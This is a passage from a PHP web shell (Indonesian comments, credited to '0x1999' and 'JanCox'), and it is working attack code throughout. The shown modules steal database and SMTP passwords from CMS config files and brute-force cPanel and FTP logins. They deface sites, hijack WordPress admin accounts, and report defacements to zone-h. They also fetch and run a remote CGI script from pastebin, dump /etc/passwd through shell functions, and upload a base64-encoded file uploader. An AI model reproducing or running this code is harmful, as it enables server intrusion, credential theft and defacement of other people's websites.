  3225.         <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  3226.         function cp_pass($dir) {
  3227.             $pass = "";
  3228.             $dira = scandir($dir);
  3229.             foreach($dira as $dirb) {
  3230.                 if(!is_file("$dir/$dirb")) continue;
  3231.                 $ambil = file_get_contents("$dir/$dirb");
  3232.                 if(preg_match("/WordPress/", $ambil)) {
  3233.                     $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
  3234.                 } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  3235.                     $pass .= ambilkata($ambil,"password = '","'")."\n";
  3236.                 } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  3237.                     $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
  3238.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  3239.                     $pass .= ambilkata($ambil,'password = "','"')."\n";
  3240.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  3241.                     $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
  3242.                 } elseif(preg_match("/client/", $ambil)) {
  3243.                     preg_match("/password=(.*)/", $ambil, $pass1);
  3244.                     if(preg_match('/"/', $pass1[1])) {
  3245.                         $pass1[1] = str_replace('"', "", $pass1[1]);
  3246.                         $pass .= $pass1[1]."\n";
  3247.                     }
  3248.                 } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  3249.                     $pass .= ambilkata($ambil,"db_password = '","'")."\n";
  3250.                 }
  3251.             }
  3252.             echo $pass;
  3253.         }
  3254.         $cp_pass = cp_pass($dir);
  3255.         echo $cp_pass;
  3256.         echo "</textarea><br>
  3257.         <input type='submit' name='crack' style='width: 450px;' value='Crack'>
  3258.         </form>
  3259.         <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
  3260.     }
  3261. } elseif($_GET['do'] == 'smtp') {
  3262.     echo "<center><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span></center><br>";
  3263.     function scj($dir) {
  3264.         $dira = scandir($dir);
  3265.         foreach($dira as $dirb) {
  3266.             if(!is_file("$dir/$dirb")) continue;
  3267.             $ambil = file_get_contents("$dir/$dirb");
  3268.             $ambil = str_replace("$", "", $ambil);
  3269.             if(preg_match("/JConfig|joomla/", $ambil)) {
  3270.                 $smtp_host = ambilkata($ambil,"smtphost = '","'");
  3271.                 $smtp_auth = ambilkata($ambil,"smtpauth = '","'");
  3272.                 $smtp_user = ambilkata($ambil,"smtpuser = '","'");
  3273.                 $smtp_pass = ambilkata($ambil,"smtppass = '","'");
  3274.                 $smtp_port = ambilkata($ambil,"smtpport = '","'");
  3275.                 $smtp_secure = ambilkata($ambil,"smtpsecure = '","'");
  3276.                 echo "SMTP Host: <font color=lime>$smtp_host</font><br>";
  3277.                 echo "SMTP port: <font color=lime>$smtp_port</font><br>";
  3278.                 echo "SMTP user: <font color=lime>$smtp_user</font><br>";
  3279.                 echo "SMTP pass: <font color=lime>$smtp_pass</font><br>";
  3280.                 echo "SMTP auth: <font color=lime>$smtp_auth</font><br>";
  3281.                 echo "SMTP secure: <font color=lime>$smtp_secure</font><br><br>";
  3282.             }
  3283.         }
  3284.     }
  3285.     $smpt_hunter = scj($dir);
  3286.     echo $smpt_hunter;
  3287. } elseif($_GET['do'] == 'auto_wp') {
  3288.     if($_POST['hajar']) {
  3289.         $title = htmlspecialchars($_POST['new_title']);
  3290.         $pn_title = str_replace(" ", "-", $title);
  3291.         if($_POST['cek_edit'] == "Y") {
  3292.             $script = $_POST['edit_content'];
  3293.         } else {
  3294.             $script = $title;
  3295.         }
  3296.         $conf = $_POST['config_dir'];
  3297.         $scan_conf = scandir($conf);
  3298.         foreach($scan_conf as $file_conf) {
  3299.             if(!is_file("$conf/$file_conf")) continue;
  3300.             $config = file_get_contents("$conf/$file_conf");
  3301.             if(preg_match("/WordPress/", $config)) {
  3302.                 $dbhost = ambilkata($config,"DB_HOST', '","'");
  3303.                 $dbuser = ambilkata($config,"DB_USER', '","'");
  3304.                 $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  3305.                 $dbname = ambilkata($config,"DB_NAME', '","'");
  3306.                 $dbprefix = ambilkata($config,"table_prefix  = '","'");
  3307.                 $prefix = $dbprefix."posts";
  3308.                 $option = $dbprefix."options";
  3309.                 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  3310.                 $db = mysql_select_db($dbname);
  3311.                 $q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
  3312.                 $result = mysql_fetch_array($q);
  3313.                 $id = $result[ID];
  3314.                 $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  3315.                 $result2 = mysql_fetch_array($q2);
  3316.                 $target = $result2[option_value];
  3317.                 $update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$script',post_name='$pn_title',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'");
  3318.                 $update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'");
  3319.                 echo "<div style='margin: 5px auto;'>";
  3320.                 if($target == '') {
  3321.                     echo "URL: <font color=red>error, gabisa ambil nama domain nya</font> -> ";
  3322.                 } else {
  3323.                     echo "URL: <a href='$target/?p=$id' target='_blank'>$target/?p=$id</a> -> ";
  3324.                 }
  3325.                 if(!$update OR !$conn OR !$db) {
  3326.                     echo "<font color=red>MySQL Error: ".mysql_error()."</font><br>";
  3327.                 } else {
  3328.                     echo "<font color=lime>sukses di ganti.</font><br>";
  3329.                 }
  3330.                 echo "</div>";
  3331.                 mysql_close($conn);
  3332.             }
  3333.         }
  3334.     } else {
  3335.         echo "<center>
  3336.         <h1>Auto Edit Title+Content WordPress</h1>
  3337.         <form method='post'>
  3338.         DIR Config: <br>
  3339.         <input type='text' size='50' name='config_dir' value='$dir'><br><br>
  3340.         Set Title: <br>
  3341.         <input type='text' name='new_title' value='Hacked By 0x1999' placeholder='New Title'><br><br>
  3342.         Edit Content?: <input type='radio' name='cek_edit' value='Y' checked>Y<input type='radio' name='cek_edit' value='N'>N<br>
  3343.         <span>Jika pilih <u>Y</u> masukin script defacemu ( saran yang simple aja ), kalo pilih <u>N</u> gausah di isi.</span><br>
  3344.         <textarea name='edit_content' placeholder='contoh script: http://pastebin.com/EpP671gK' style='width: 450px; height: 150px;'></textarea><br>
  3345.         <input type='submit' name='hajar' value='Hajar!' style='width: 450px;'><br>
  3346.         </form>
  3347.         <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
  3348.         ";
  3349.     }
  3350. } elseif($_GET['do'] == 'zoneh') {
  3351.     if($_POST['submit']) {
  3352.         $domain = explode("\r\n", $_POST['url']);
  3353.         $nick =  $_POST['nick'];
  3354.         echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
  3355.         echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
  3356.         function zoneh($url,$nick) {
  3357.             $ch = curl_init("http://www.zone-h.com/notify/single");
  3358.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  3359.                   curl_setopt($ch, CURLOPT_POST, true);
  3360.                   curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
  3361.             return curl_exec($ch);
  3362.                   curl_close($ch);
  3363.         }
  3364.         foreach($domain as $url) {
  3365.             $zoneh = zoneh($url,$nick);
  3366.             if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
  3367.                 echo "$url -> <font color=lime>OK</font><br>";
  3368.             } else {
  3369.                 echo "$url -> <font color=red>ERROR</font><br>";
  3370.             }
  3371.         }
  3372.     } else {
  3373.         echo "<center><form method='post'>
  3374.         <u>Defacer</u>: <br>
  3375.         <input type='text' name='nick' size='50' value='0x1999'><br>
  3376.         <u>Domains</u>: <br>
  3377.         <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
  3378.         <input type='submit' name='submit' value='Submit' style='width: 450px;'>
  3379.         </form>";
  3380.     }
  3381.     echo "</center>";
  3382. }elseif($_GET['do'] == 'cpftp_auto') {
  3383.     if($_POST['crack']) {
  3384.         $usercp = explode("\r\n", $_POST['user_cp']);
  3385.         $passcp = explode("\r\n", $_POST['pass_cp']);
  3386.         $i = 0;
  3387.         foreach($usercp as $ucp) {
  3388.             foreach($passcp as $pcp) {
  3389.                 if(@mysql_connect('localhost', $ucp, $pcp)) {
  3390.                     if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  3391.                     } else {
  3392.                         $_SESSION[$ucp] = "1";
  3393.                         $_SESSION[$pcp] = "1";
  3394.                         if($ucp == '' || $pcp == '') {
  3395.                             //
  3396.                         } else {
  3397.                             echo "[+] username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
  3398.                             $ftp_conn = ftp_connect(gethostbyname($_SERVER['HTTP_HOST']));
  3399.                             $ftp_login = ftp_login($ftp_conn, $ucp, $pcp);
  3400.                             if((!$ftp_login) || (!$ftp_conn)) {
  3401.                                 echo "[+] <font color=red>Login Gagal</font><br><br>";
  3402.                             } else {
  3403.                                 echo "[+] <font color=lime>Login Sukses</font><br>";
  3404.                                 $fi = htmlspecialchars($_POST['file_deface']);
  3405.                                 $deface = ftp_put($ftp_conn, "public_html/$fi", $_POST['deface'], FTP_BINARY);
  3406.                                 if($deface) {
  3407.                                     $i++;
  3408.                                     echo "[+] <font color=lime>Deface Sukses</font><br>";
  3409.                                     if(function_exists('posix_getpwuid')) {
  3410.                                         $domain_cp = file_get_contents("/etc/named.conf"); 
  3411.                                         if($domain_cp == '') {
  3412.                                             echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
  3413.                                         } else {
  3414.                                             preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
  3415.                                             foreach($domains_cp[1] as $dj) {
  3416.                                                 $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  3417.                                                 $user_cp_url = $user_cp_url['name'];
  3418.                                                 if($user_cp_url == $ucp) {
  3419.                                                     echo "[+] <a href='http://$dj/$fi' target='_blank'>http://$dj/$fi</a><br><br>";
  3420.                                                     break;
  3421.                                                 }
  3422.                                             }
  3423.                                         }
  3424.                                     } else {
  3425.                                         echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
  3426.                                     }
  3427.                                 } else {
  3428.                                     echo "[-] <font color=red>Deface Gagal</font><br><br>";
  3429.                                 }
  3430.                             }
  3431.                             //echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
  3432.                         }
  3433.                     }
  3434.                 }
  3435.             }
  3436.         }
  3437.         if($i == 0) {
  3438.         } else {
  3439.             echo "<br>Sukses Deface ".$i." Cpanel by <font color=lime>JanCox.</font>";
  3440.         }
  3441.     } else {
  3442.         echo "<center>
  3443.         <form method='post'>
  3444.         Filename: <br>
  3445.         <input type='text' name='file_deface' placeholder='index.php' value='index.php' style='width: 450px;'><br>
  3446.         Deface Page: <br>
  3447.         <input type='text' name='deface' placeholder='http://www.web-yang-udah-do-deface.com/filemu.php' style='width: 450px;'><br>
  3448.         USER: <br>
  3449.         <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  3450.         $_usercp = fopen("/etc/passwd","r");
  3451.         while($getu = fgets($_usercp)) {
  3452.             if($getu == '' || !$_usercp) {
  3453.                 echo "<font color=red>Can't read /etc/passwd</font>";
  3454.             } else {
  3455.                 preg_match_all("/(.*?):x:/", $getu, $u);
  3456.                 foreach($u[1] as $user_cp) {
  3457.                         if(is_dir("/home/$user_cp/public_html")) {
  3458.                             echo "$user_cp\n";
  3459.                     }
  3460.                 }
  3461.             }
  3462.         }
  3463.         echo "</textarea><br>
  3464.         PASS: <br>
  3465.         <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  3466.         function cp_pass($dir) {
  3467.             $pass = "";
  3468.             $dira = scandir($dir);
  3469.             foreach($dira as $dirb) {
  3470.                 if(!is_file("$dir/$dirb")) continue;
  3471.                 $ambil = file_get_contents("$dir/$dirb");
  3472.                 if(preg_match("/WordPress/", $ambil)) {
  3473.                     $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
  3474.                 } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  3475.                     $pass .= ambilkata($ambil,"password = '","'")."\n";
  3476.                 } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  3477.                     $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
  3478.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  3479.                     $pass .= ambilkata($ambil,'password = "','"')."\n";
  3480.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  3481.                     $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
  3482.                 } elseif(preg_match("/client/", $ambil)) {
  3483.                     preg_match("/password=(.*)/", $ambil, $pass1);
  3484.                     if(preg_match('/"/', $pass1[1])) {
  3485.                         $pass1[1] = str_replace('"', "", $pass1[1]);
  3486.                         $pass .= $pass1[1]."\n";
  3487.                     }
  3488.                 } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  3489.                     $pass .= ambilkata($ambil,"db_password = '","'")."\n";
  3490.                 }
  3491.             }
  3492.             echo $pass;
  3493.         }
  3494.         $cp_pass = cp_pass($dir);
  3495.         echo $cp_pass;
  3496.         echo "</textarea><br>
  3497.         <input type='submit' name='crack' style='width: 450px;' value='Hajar'>
  3498.         </form>
  3499.         <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
  3500.     }
  3501. }
  3502.  elseif($_GET['do'] == 'cgi') {
  3503.     $cgi_dir = mkdir('idx_cgi', 0755);
  3504.     $file_cgi = "idx_cgi/cgi.izo";
  3505.     $isi_htcgi = "AddHandler cgi-script .izo";
  3506.     $htcgi = fopen(".htaccess", "w");
  3507.     $cgi_script = file_get_contents("http://pastebin.com/raw.php?i=XTUFfJLg");
  3508.     $cgi = fopen($file_cgi, "w");
  3509.     fwrite($cgi, $cgi_script);
  3510.     fwrite($htcgi, $isi_htcgi);
  3511.     chmod($file_cgi, 0755);
  3512.     echo "<iframe src='idx_cgi/cgi.izo' width='100%' height='100%' frameborder='0' scrolling='no'></iframe>";
  3513. } elseif($_GET['do'] == 'fake_root') {
  3514.     ob_start();
  3515.     function reverse($url) {
  3516.         $ch = curl_init("http://domains.yougetsignal.com/domains.php");
  3517.               curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
  3518.               curl_setopt($ch, CURLOPT_POSTFIELDS,  "remoteAddress=$url&ket=");
  3519.               curl_setopt($ch, CURLOPT_HEADER, 0);
  3520.               curl_setopt($ch, CURLOPT_POST, 1);
  3521.         $resp = curl_exec($ch);
  3522.         $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",",  str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
  3523.         $array = explode(",,", $resp);
  3524.         unset($array[0]);
  3525.         foreach($array as $lnk) {
  3526.             $lnk = "http://$lnk";
  3527.             $lnk = str_replace(",", "", $lnk);
  3528.             echo $lnk."\n";
  3529.             ob_flush();
  3530.             flush();
  3531.         }
  3532.               curl_close($ch);
  3533.     }
  3534.     function cek($url) {
  3535.         $ch = curl_init($url);
  3536.               curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
  3537.               curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
  3538.         $resp = curl_exec($ch);
  3539.         return $resp;
  3540.     }
  3541.     $cwd = getcwd();
  3542.     $ambil_user = explode("/", $cwd);
  3543.     $user = $ambil_user[2];
  3544.     if($_POST['reverse']) {
  3545.         $site = explode("\r\n", $_POST['url']);
  3546.         $file = $_POST['file'];
  3547.         foreach($site as $url) {
  3548.             $cek = cek("$url/~$user/$file");
  3549.             if(preg_match("/hacked/i", $cek)) {
  3550.                 echo "URL: <a href='$url/~$user/$file' target='_blank'>$url/~$user/$file</a> -> <font color=lime>Fake Root!</font><br>";
  3551.             }
  3552.         }
  3553.     } else {
  3554.         echo "<center><form method='post'>
  3555.         Filename: <br><input type='text' name='file' value='deface.html' size='50' height='10'><br>
  3556.         User: <br><input type='text' value='$user' size='50' height='10' readonly><br>
  3557.         Domain: <br>
  3558.         <textarea style='width: 450px; height: 250px;' name='url'>";
  3559.         reverse($_SERVER['HTTP_HOST']);
  3560.         echo "</textarea><br>
  3561.         <input type='submit' name='reverse' value='Scan Fake Root!' style='width: 450px;'>
  3562.         </form><br>
  3563.         NB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /home/user/public_html.</center>";
  3564.     }
  3565. } elseif($_GET['do'] == 'adminer') {
  3566.     $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  3567.     function adminer($url, $isi) {
  3568.         $fp = fopen($isi, "w");
  3569.         $ch = curl_init();
  3570.               curl_setopt($ch, CURLOPT_URL, $url);
  3571.               curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
  3572.               curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  3573.               curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  3574.               curl_setopt($ch, CURLOPT_FILE, $fp);
  3575.         return curl_exec($ch);
  3576.               curl_close($ch);
  3577.         fclose($fp);
  3578.         ob_flush();
  3579.         flush();
  3580.     }
  3581.     if(file_exists('adminer.php')) {
  3582.         echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  3583.     } else {
  3584.         if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
  3585.             echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  3586.         } else {
  3587.             echo "<center><font color=red>gagal buat file adminer</font></center>";
  3588.         }
  3589.     }
  3590. }elseif($_GET['do'] == 'passwbypass') {
  3591.     echo '<center>Bypass etc/passw With:<br>
  3592. <table style="width:50%">
  3593.  <tr>
  3594.    <td><form method="post"><input type="submit" value="System Function" name="syst"></form></td>
  3595.    <td><form method="post"><input type="submit" value="Passthru Function" name="passth"></form></td>
  3596.     <td><form method="post"><input type="submit" value="Exec Function" name="ex"></form></td>  
  3597.     <td><form method="post"><input type="submit" value="Shell_exec Function" name="shex"></form></td>      
  3598.    <td><form method="post"><input type="submit" value="Posix_getpwuid Function" name="melex"></form></td>
  3599. </tr></table>Bypass User With : <table style="width:50%">
  3600. <tr>
  3601.    <td><form method="post"><input type="submit" value="Awk Program" name="awkuser"></form></td>
  3602.    <td><form method="post"><input type="submit" value="System Function" name="systuser"></form></td>
  3603.     <td><form method="post"><input type="submit" value="Passthru Function" name="passthuser"></form></td>  
  3604.     <td><form method="post"><input type="submit" value="Exec Function" name="exuser"></form></td>      
  3605.    <td><form method="post"><input type="submit" value="Shell_exec Function" name="shexuser"></form></td>
  3606. </tr>
  3607. </table><br>';
  3608.  
  3609.  
  3610. if ($_POST['awkuser']) {
  3611. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  3612. echo shell_exec("awk -F: '{ print $1 }' /etc/passwd | sort");
  3613. echo "</textarea><br>";
  3614. }
  3615. if ($_POST['systuser']) {
  3616. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  3617. echo system("ls /var/mail");
  3618. echo "</textarea><br>";
  3619. }
  3620. if ($_POST['passthuser']) {
  3621. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  3622. echo passthru("ls /var/mail");
  3623. echo "</textarea><br>";
  3624. }
  3625. if ($_POST['exuser']) {
  3626. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  3627. echo exec("ls /var/mail");
  3628. echo "</textarea><br>";
  3629. }
  3630. if ($_POST['shexuser']) {
  3631. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  3632. echo shell_exec("ls /var/mail");
  3633. echo "</textarea><br>";
  3634. }
  3635. if($_POST['syst'])
  3636. {
  3637. echo"<textarea class='inputz' cols='65' rows='15'>";
  3638. echo system("cat /etc/passwd");
  3639. echo"</textarea><br><br><b></b><br>";
  3640. }
  3641. if($_POST['passth'])
  3642. {
  3643. echo"<textarea class='inputz' cols='65' rows='15'>";
  3644. echo passthru("cat /etc/passwd");
  3645. echo"</textarea><br><br><b></b><br>";
  3646. }
  3647. if($_POST['ex'])
  3648. {
  3649. echo"<textarea class='inputz' cols='65' rows='15'>";
  3650. echo exec("cat /etc/passwd");
  3651. echo"</textarea><br><br><b></b><br>";
  3652. }
  3653. if($_POST['shex'])
  3654. {
  3655. echo"<textarea class='inputz' cols='65' rows='15'>";
  3656. echo shell_exec("cat /etc/passwd");
  3657. echo"</textarea><br><br><b></b><br>";
  3658. }
  3659. echo '<center>';
  3660. if($_POST['melex'])
  3661. {
  3662. echo"<textarea class='inputz' cols='65' rows='15'>";
  3663. for($uid=0;$uid<60000;$uid++){
  3664. $ara = posix_getpwuid($uid);
  3665. if (!empty($ara)) {
  3666. while (list ($key, $val) = each($ara)){
  3667. print "$val:";
  3668. }
  3669. print "\n";
  3670. }
  3671. }
  3672. echo"</textarea><br><br>";
  3673. }
  3674. //
  3675.  
  3676. //
  3677. } elseif($_GET['do'] == 'auto_dwp') {
  3678.     if($_POST['auto_deface_wp']) {
  3679.         function anucurl($sites) {
  3680.             $ch = curl_init($sites);
  3681.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  3682.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  3683.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  3684.                   curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  3685.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  3686.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  3687.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  3688.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  3689.                   curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  3690.             $data = curl_exec($ch);
  3691.                   curl_close($ch);
  3692.             return $data;
  3693.         }
  3694.         function lohgin($cek, $web, $userr, $pass, $wp_submit) {
  3695.             $post = array(
  3696.                    "log" => "$userr",
  3697.                    "pwd" => "$pass",
  3698.                    "rememberme" => "forever",
  3699.                    "wp-submit" => "$wp_submit",
  3700.                    "redirect_to" => "$web",
  3701.                    "testcookie" => "1",
  3702.                    );
  3703.             $ch = curl_init($cek);
  3704.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  3705.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  3706.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  3707.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  3708.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  3709.                   curl_setopt($ch, CURLOPT_POST, 1);
  3710.                   curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  3711.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  3712.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  3713.                   curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  3714.             $data = curl_exec($ch);
  3715.                   curl_close($ch);
  3716.             return $data;
  3717.         }
  3718.         $scan = $_POST['link_config'];
  3719.         $link_config = scandir($scan);
  3720.         $script = htmlspecialchars($_POST['script']);
  3721.         $user = "0x1999";
  3722.         $pass = "0x1999";
  3723.         $passx = md5($pass);
  3724.         foreach($link_config as $dir_config) {
  3725.             if(!is_file("$scan/$dir_config")) continue;
  3726.             $config = file_get_contents("$scan/$dir_config");
  3727.             if(preg_match("/WordPress/", $config)) {
  3728.                 $dbhost = ambilkata($config,"DB_HOST', '","'");
  3729.                 $dbuser = ambilkata($config,"DB_USER', '","'");
  3730.                 $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  3731.                 $dbname = ambilkata($config,"DB_NAME', '","'");
  3732.                 $dbprefix = ambilkata($config,"table_prefix  = '","'");
  3733.                 $prefix = $dbprefix."users";
  3734.                 $option = $dbprefix."options";
  3735.                 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  3736.                 $db = mysql_select_db($dbname);
  3737.                 $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  3738.                 $result = mysql_fetch_array($q);
  3739.                 $id = $result[ID];
  3740.                 $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  3741.                 $result2 = mysql_fetch_array($q2);
  3742.                 $target = $result2[option_value];
  3743.                 if($target == '') {                
  3744.                     echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
  3745.                 } else {
  3746.                     echo "[+] $target <br>";
  3747.                 }
  3748.                 $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
  3749.                 if(!$conn OR !$db OR !$update) {
  3750.                     echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
  3751.                     mysql_close($conn);
  3752.                 } else {
  3753.                     $site = "$target/wp-login.php";
  3754.                     $site2 = "$target/wp-admin/theme-install.php?upload";
  3755.                     $b1 = anucurl($site2);
  3756.                     $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
  3757.                     $b = lohgin($site, $site2, $user, $pass, $wp_sub);
  3758.                     $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
  3759.                     $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
  3760.                     $www = "m.php";
  3761.                     $fp5 = fopen($www,"w");
  3762.                     fputs($fp5,$upload3);
  3763.                     $post2 = array(
  3764.                             "_wpnonce" => "$anu2",
  3765.                             "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
  3766.                             "themezip" => "@$www",
  3767.                             "install-theme-submit" => "Install Now",
  3768.                             );
  3769.                     $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
  3770.                           curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  3771.                           curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  3772.                           curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  3773.                           curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  3774.                           curl_setopt($ch, CURLOPT_POST, 1);
  3775.                           curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
  3776.                           curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  3777.                           curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  3778.                           curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  3779.                     $data3 = curl_exec($ch);
  3780.                           curl_close($ch);
  3781.                     $y = date("Y");
  3782.                     $m = date("m");
  3783.                     $namafile = "id.php";
  3784.                     $fpi = fopen($namafile,"w");
  3785.                     fputs($fpi,$script);
  3786.                     $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
  3787.                            curl_setopt($ch6, CURLOPT_POST, true);
  3788.                            curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
  3789.                            curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
  3790.                            curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
  3791.                            curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
  3792.                            curl_setopt($ch6, CURLOPT_COOKIESESSION, true);
  3793.                     $postResult = curl_exec($ch6);
  3794.                            curl_close($ch6);
  3795.                     $as = "$target/k.php";
  3796.                     $bs = anucurl($as);
  3797.                     if(preg_match("#$script#is", $bs)) {
  3798.                         echo "[+] <font color='lime'>berhasil mepes...</font><br>";
  3799.                         echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
  3800.                         } else {
  3801.                         echo "[-] <font color='red'>gagal mepes...</font><br>";
  3802.                         echo "[!!] coba aja manual: <br>";
  3803.                         echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
  3804.                         echo "[+] username: <font color=lime>$user</font><br>";
  3805.                         echo "[+] password: <font color=lime>$pass</font><br><br>";    
  3806.                         }
  3807.                     mysql_close($conn);
  3808.                 }
  3809.             }
  3810.         }
  3811.     } else {
